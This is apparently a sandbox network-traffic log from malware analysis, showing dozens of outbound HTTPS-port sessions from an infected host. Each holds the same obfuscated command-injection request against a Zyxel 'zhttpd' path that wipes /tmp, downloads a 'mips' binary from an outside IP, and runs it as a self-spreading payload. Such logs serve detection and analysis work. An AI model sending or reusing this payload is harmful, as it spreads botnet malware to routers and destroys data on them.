                              Mar 31, 2024 08:41:28.876817942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4609192.168.2.1355920134.178.10.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876863956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4610192.168.2.134049825.254.170.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876910925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4611192.168.2.1358146122.63.211.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876954079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4612192.168.2.1360178189.245.133.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876974106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4613192.168.2.134945459.34.11.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877006054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4614192.168.2.1344400199.32.233.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877053022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4615192.168.2.1351280123.116.255.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877090931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4616192.168.2.135528039.88.167.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877137899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4617192.168.2.1351570119.127.81.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877172947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4618192.168.2.133656419.118.13.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877198935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4619192.168.2.1344128120.243.207.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877254963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4620192.168.2.1356778105.59.170.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877295971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4621192.168.2.1332788200.163.109.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877335072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4622192.168.2.1356542176.36.28.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877368927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4623192.168.2.1340742222.150.148.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877423048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4624192.168.2.134387697.158.199.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877470016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4625192.168.2.1356322199.119.174.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877501011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4626192.168.2.133776849.190.224.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877552032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4627192.168.2.1338486155.67.192.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877578974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4628192.168.2.1339424183.80.21.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877610922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4629192.168.2.1346064117.252.206.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877667904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4630192.168.2.134958073.153.135.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877717972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4631192.168.2.13409585.207.20.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877743006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4632192.168.2.1343130182.224.174.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877798080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4633192.168.2.1348256216.78.88.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877846003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4634192.168.2.1347324116.227.232.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877870083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4635192.168.2.1351000103.109.114.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877929926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4636192.168.2.1357890211.183.207.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.877958059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4637192.168.2.1359314221.229.126.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878014088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4638192.168.2.1335684190.140.161.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878046036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4639192.168.2.1340656140.112.102.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878081083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4640192.168.2.134925035.70.236.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878123999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4641192.168.2.1358718134.36.146.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878166914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4642192.168.2.133998237.16.75.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878207922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4643192.168.2.1338366152.52.66.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878257036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4644192.168.2.135609293.30.153.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878290892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4645192.168.2.1353984171.80.44.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878340960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4646192.168.2.1341916140.21.159.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878360033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4647192.168.2.13497288.28.78.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878407001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4648192.168.2.134349291.97.208.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878458023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4649192.168.2.1356274143.139.99.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878492117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4650192.168.2.134214263.42.102.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878524065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4651192.168.2.134196440.45.39.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878563881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4652192.168.2.1343794133.3.147.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878614902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4653192.168.2.1356808109.6.251.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878652096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4654192.168.2.1359488141.254.239.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878705978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4655192.168.2.1344592180.32.5.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878751040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4656192.168.2.133391881.28.199.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878781080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4657192.168.2.133347283.87.38.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878808022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4658192.168.2.134668445.219.170.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878875017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4659192.168.2.1335566149.194.124.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878914118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4660192.168.2.135177236.157.226.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.878952980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4661192.168.2.135102860.168.140.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879007101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4662192.168.2.1346354143.250.233.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879033089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4663192.168.2.1356218203.220.157.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879053116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4664192.168.2.13347704.96.28.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879076958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4665192.168.2.134889087.36.137.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879148006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4666192.168.2.135968053.29.109.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879185915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4667192.168.2.1341742111.194.16.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879203081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4668192.168.2.135901492.134.137.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879262924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4669192.168.2.1352896103.128.172.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879331112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4670192.168.2.135718480.170.180.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879340887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4671192.168.2.1351066112.205.175.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879365921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4672192.168.2.1335372165.36.190.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879431963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4673192.168.2.134943482.44.64.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879462957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4674192.168.2.1356518147.223.175.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879511118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4675192.168.2.1353830155.135.126.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879547119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4676192.168.2.135168260.10.81.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.879568100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4677192.168.2.135142687.61.148.27443
                              TimestampBytes transferredDirectionData
